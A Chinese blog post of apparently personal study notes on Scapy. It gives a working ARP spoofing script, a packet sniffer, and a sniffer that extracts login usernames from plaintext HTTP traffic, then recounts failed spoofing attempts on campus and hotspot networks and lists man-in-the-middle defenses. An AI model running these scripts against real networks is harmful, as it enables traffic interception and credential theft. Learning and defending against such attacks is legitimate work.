Scapy技术笔记(三)

已于 2023-03-31 21:34:50 修改
阅读量264 收藏
点赞数
文章标签: 安全 网络
于 2023-03-31 21:30:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63565161/article/details/129888893
版权

arp欺骗实践

ARP的缺陷

1,arp数据包用广播发送 2,arp是无状态的,可以直接发送应答包 3,arp是动态更新的,因为交换机里的MAC表有限 4,arp没有认证。

ARP欺骗的脚本

import uuid
from scapy.all import *
import os

from scapy.layers.l2 import getmacbyip, Ether, ARP


def getselfMac():
    mac= uuid.UUID(int=uuid.getnode()).hex[-12:]
    return ":".join([mac[e:e+2] for e in range(0,11,2)])
def arpspoof():
    gwIP = input("输入网关ip")
    misleadingIP=input("输入要欺骗的ip")
    mlmac = getmacbyip(misleadingIP)
    eth = Ether(dst=mlmac)
    arp = ARP(op=2,hwsrc=getselfMac(),psrc=gwIP,hwdst=mlmac,pdst=misleadingIP)
    sendp(eth/arp,inter=2,loop=1)


arpspoof()

在进行ARP欺骗的过程中遇到些关于网络原理的问题,简单记录一下。

 实际上我并没有欺骗成功。上图是我欺骗同一校园网下的一个设备。失败了,后来了解到可能是校园网使用了VLAN(虚拟局域网)技术。

当时我的理解是:

不在同一WLAN下不能进行ARP欺骗。然后我ping 了和我 “同一网关”小伙伴的电脑。 我只知道ARP欺骗要在同一WLAN下, 之前同一网段下用kali的arpspoof成功欺骗了。 但是现在的情况是我们不在同一网段,不知道是不是因为这个的影响。(后来才知道不同网段也可以欺骗)

校园网不能实现的话,我和同学开了热点尝试。

左边是同一热点下,对B(192.168.43.97)进行的ARP欺骗,已经满足了同一网络,同一网段,同一网关。但是还是失败了,明明可以ping通。还不成功那可能就是防火墙或者路由器的缘故了。

右边是对虚拟机win7进行的ARP欺骗。

Scapy编写的网络嗅探程序

使用sniff()捕获数据包后将嗅探结果保存为pacp文件

from  scapy.all import *
packet=sniff(count=5)
wrpcap("./test.pacp",packet)
from scapy.all import *
from scapy.layers.inet import IP
from scapy.layers.l2 import Ether

pcaps = rdpcap("test.pacp")
print(len(pcaps))
for pkt in pcaps:
    print("源MAC地址:"+pkt[Ether].src,
          "目标MACD地址:"+pkt[Ether].dst,
          "源IP地址为:"+pkt[IP].src,
          "目标IP地址:"+pkt[IP].dst)

提取敏感信息

import re
from scapy.all import *
from scapy.layers.inet import IP


def httpsniff(pkt):
    dest = pkt.getlayer(IP).dst  #getlayer获取协议层名字
    content = pkt.sprintf("%Raw.load%")     #提取HTTP部分
    username = re.findall('(?i)username-(.*)',content)       #某个网站提交用户名字段为"customer="时
    if username:
        print('[*] Detected http Login to '+str(dest))
        print('[+] Username:'+str(username[0]))
sniff(iface="WLAN",filter='tcp port 80',prn=httpsniff)

中间人攻击的解决方案

  1. 使用加密技术:使用安全协议如SSL/TLS等来保护数据传输过程中的机密性、完整性和认证性。
  2. 采用数字证书:数字证书是一种由权威机构颁发的证明身份的电子文件。通过验证数字证书的有效性,可以确保通信双方的身份真实可靠。
  3. 使用VPN:虚拟私有网络(VPN)是一种通过公共网络建立起加密的专用网络,在网络层面上解决了中间人攻击的问题。
  4. 认证用户身份:Web应用程序可以使用表单、cookie或其他机制来验证用户身份,从而避免黑客冒充用户登录系统。
  5. 更新软件版本:时刻关注厂商发布的安全更新,并及时更新软件版本,以修复安全漏洞。
  6. 静态绑定路由表
  7. 使用DHCP snooping功能
  8. 划分VLAN
clown_0x00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python灰帽——Scapy模块 / 数据包的构造、发送、接收、捕获
weixin_51559599的博客
01-17 4358
" 网络神器 "scapy是 python 的一个第方模块,能够发送、捕获、分析和铸造网络数据包主要功能:扫描、识别、测试、攻击、包铸造、抓包分析。
scapy库下找不到IP,TCP模板
weixin_60274164的博客
02-28 371
pycharm 尝试导入模块时发现无对应IP、TCP模块,查找后发现此模块在最新版本中转移到其他包里面。某书中示例导入TCP,IP模块是通过from scapy.all import TCP,IP。故可通过 from scapy.layers.inet import TCP,IP 正常导入。最新版本的scapy库中,TCP,IP模块存在scapy.layers.inet中。声明:仅作为个人学习笔记使用。
scapy使用入门
GodLaughing
07-25 7668
启动 直接执行scapy启动交互式CLI界面。 在脚本中:from scapy.all import * 常用命令 ls() 常用的有ARP、Ether、ICMP、IP、UDP、TCP,也支持SNMP、DHCP、STP等。ls(IP) 查看IP包结构lsc() 查看支持的命令 构造报文 //类型+字段,缺省的不用设置 a=
Python中Scapy使用方法,模块中的常用函数,简单的端口扫描编写
热门推荐
sGanYu
07-08 1万+
目录scapy是什么scapy的使用IP()src()和dst()Ether()采用分层的方式来构造数据包raw()和hexdump()summary()和show()如何在scapy中发送和接收数据包send()和sendp()sr()、sr1()和srp()简单的端口扫描sniff()使用scapy编写简单的端口扫描scapy是一个可用作网络嗅探,独立运行的工具,它提供了一个和python相同的交互方式命令行环境,可以在kali内单独运行,该类库在网络安全领域有非常广泛用例,可用于漏洞利用开发、流量的分
Scapy实现基于ARP/ICMP/TCP/UDP的活跃设备扫描技术,以及TCP全/半端口扫描
sGanYu
07-12 3983
目录基于ARP的活跃设备发现基于ICMP的活跃设备发现基于TCP扫描的活跃设备发现基于UDP扫描的活跃设备发现Scapy实现端口扫描基于TCP全开端口扫描基于TCP半开端口扫描ARP:地址解析协议,ARP(Address Resolution Protocol)根据IP地址获取物理地址的一个TCP/IP协议,环境所在的设备如果只知道目的设备的IP地址却不知道其MAC地址的时候,可以通过这种协议,使用以太 广播包给网络上的每一台设备发送ARP数据包,获取其中符合条件的MAC地址,以保证通信的顺利进行ARP的工
python scapy模块安装后引用错误,python – scapy未解决的引用
weixin_34163020的博客
03-25 1271
我正在使用scapy在python中编写的网络工具.作为IDE,我正在使用Pycharm.我的代码有效.因此,如果我运行它,一切都按预期工作.我的问题是PyCharm给了我一些错误.它标志着IP,TCP,以太网的所有用途……作为未定义的参考…我的代码的相关部分看起来像这样#!/usr/bin/env pythonfrom scapy.all import *......syn = IP(src=s...
Scapy网络数据包修改工具
07-25
Scapy是一款强大的网络数据包操作库,主要用于创建、解析和修改网络报文。它在网络安全、渗透测试、网络分析等领域有着广泛的应用。本工具利用Scapy的功能,专注于对EDIG(可能是指特定的网络协议或数据格式)进行...
Scapy中文使用文档.pdf
09-30
Scapy中文使用文档.pdf
python scapy模块
01-03
Scapy是Python中一个强大的网络数据包操作库,它允许用户创建、解析和发送几乎任何网络协议的数据包。这个模块的灵活性和深度使其在网络安全网络分析和测试领域有着广泛的应用。下面我们将深入探讨Scapy的功能、...
python_scapy
03-17
网络嗅探是一种技术,通过捕获网络上的数据包来监控网络通信。使用Scapy,你可以编写一个简单的嗅探器,例如Wireshark的命令行替代品,来查看和分析网络流量。这涉及到对套接字编程的理解,以及如何配置网络接口到...
Python项目 基于Scapy实现SYN泛洪攻击的方法
01-20
python3版本的ScapyScapy3k来实现一个简单的DDos。 首先实现SYN泛洪攻击(SYN Flood,是一直常用的DOS方式之一,通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽的攻击方式)。TCP次握手的过程在这里就不再赘述,SYN攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果超过一定的时间没有接收到客户端的报文,那么本次连接在协议栈中存储的数据就会被丢弃。攻击者如果利用这段时间发送了大量的连接请求,全部挂起在半连接状态,这样将不断消耗服务器资源,直到拒接服务。 Scapy
anaconda-scapy
02-21
Scapy是一个强大的网络数据包处理库,用于创建、分析和操控网络数据包。它是由Ecole Nationale Supérieure des Télécommunications de Bretagne (ENST)开发的,并且广泛应用于网络安全网络诊断、协议开发等领域...
scapy 解析pcap数据包笔记
qq_28808697的博客
08-28 2103
from scapy.all import * def analyzePcap(filepath): s1 = PcapReader(filepath) # data 是以太网 数据包 data = s1.read_packet() ip_packet = data.payload icmp_packet = ip_packet.payload payload = icmp_packet.payload original_payload = .
Scrapy IP()类 编程指南(基础)
最新发布
diaobusi的博客
01-27 1247
工欲善其事,必先利其器,在聊ScapyIP类时,我们先要了解IP是什么。IP指的是Internet Protocol(互联网协议)的数据包。Internet Protocol是互联网上用于在网络中传输数据的一种协议。在TCP/IP协议族中,IP层负责数据包的路由和寻址,确保数据能够在网络中正确传递。IP协议定义了一种在网络中唯一标识设备(主机或路由器)的方式,并提供了一种将数据分割成小的数据包进行传输的机制。每个数据包都包含源和目标设备的IP地址,以便路由器能够正确地将数据包从源传输到目标。IP协议又分为。
scapy TLS/SSL 流量数据操作
uno的博客
05-22 5195
scapy TLS/SSL 流量数据操作 本文仅接上文介绍如何使用 Python scapy 从pcap数据包中提取TLS/SSL数据包的基本信息,例如SNI等。 参考:https://scapy.readthedocs.io/en/latest/api/scapy.layers.tls.html 前言 scapy 能够从pcap包中提取出数据包对象,可以直接通过pkt.show()输出显示数据包内容,对一个TLS(client hello)数据包的显示如下图: 代码: from scapy.all im
python 指定证书验证_python – 在Scrapy中禁用SSL证书验证
weixin_39531374的博客
12-14 1482
我目前正在努力解决与Scrapy有关的问题.每当我使用Scrapy刮取证书的CN值与服务器域名匹配的HTTPS站点时,Scrapy效果很好!另一方面,每当我尝试抓取证书的CN值与服务器的域名不匹配的网站时,我会得到以下内容:Traceback (most recent call last):File "/usr/local/lib/python2.7/dist-packages/twisted/p...
linux内核处理arp报文,linux Scapy 进行arp数据包详细过程
weixin_42509196的博客
04-30 516
root@hak:~# scapyWARNING: No route found for IPv6 destination :: (no default route?)INFO: Can't import python ecdsa lib. Disabled certificate manipulation toolsWelcome to Scapy (unknown.version)a=Ethe...
scapy基本使用
qq_38307618的博客
04-14 5382
scapy基本使用 官方手册 官方介绍文档 python官网 scapy模块 from scapy.all import * //来自scapy.all文件,导入所有函数 python交互模式中:ls()=Ether、IP、ICMP、TCP、UDP、ARP 等等,查看可以配置的参数 1.构建包:不同层之间用/分隔(常用) Ether = Ether(src=“源mac”,dst=“目的mac”) //以太网层 = 二层 IP = IP(src=“源ip”,dst=“目的ip或者URL
Understanding_SSL_TLS
mosaicwang的博客
10-13 265
#参考文档: Understanding_SSL_TLS.pdf #缩写 SSL Secure Sockets Layer 安全套接层 TLS Transport Layer Security #什么是SSL 基于RSA算法(提出算法的3人的字母缩写) 公钥加密系统 ##SSL功能 加密 完整性 认证 不可否认性 ##数学公式 RSA算法:https://en.wikipedia.org/wi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值